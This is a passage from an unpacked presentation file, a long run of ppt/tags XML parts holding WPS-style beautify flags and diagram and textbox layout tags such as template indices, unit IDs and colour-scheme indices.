  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag310.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311.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312.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag313.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1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20227679_5*l_h_i*1_1_1"/>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4.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3"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20227679_5*l_h_i*1_1_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag315.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TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_4"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20227679_5*l_h_i*1_1_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag316.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="diagram20227679_5*l_h_i*1_1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag317.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag318.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag319.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag32.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag320.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag321.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag322.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag323.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag324.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag325.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag326.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag327.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag328.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag329.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag33.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag330.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag331.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag332.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag333.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag334.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag335.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag336.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag337.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag338.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag339.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag34.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag340.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag341.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_SHAPETYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTLEFT" val="0_-29.09998"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTTOP" val="0_-63.95001"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTWIDTH" val="100_58.19998"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTHEIGTH" val="100_109.65"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*1"/>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42.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_SHAPETYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTLEFT" val="10_-35.445"/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_ADJUSTTOP" val="0_-63.95001"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISNUMVISUAL" val="0"/>
  <p:tag name="KSO_WM_UNIT_DIAGRAM_ISREFERUNIT" val="0"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="mixed"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20201941"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_GUID" val="{b6114a12-4d76-4813-96de-34db54c419f7}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag343.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag344.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag345.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag346.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag347.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag348.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag349.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag35.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag350.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag351.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag352.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag353.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag354.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag355.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag356.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag357.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag358.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag359.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3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360.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag361.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag362.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag363.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag364.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag365.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag366.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag367.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag368.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag369.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag37.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag370.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag371.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag372.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag373.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag374.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag375.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag376.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag377.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag378.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag379.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag38.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag380.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag381.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag382.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag383.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag384.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag385.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag386.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag387.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag388.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag389.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag39.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag390.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag391.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag392.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag393.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag394.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag395.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag396.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag397.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag398.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag399.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag400.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag401.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
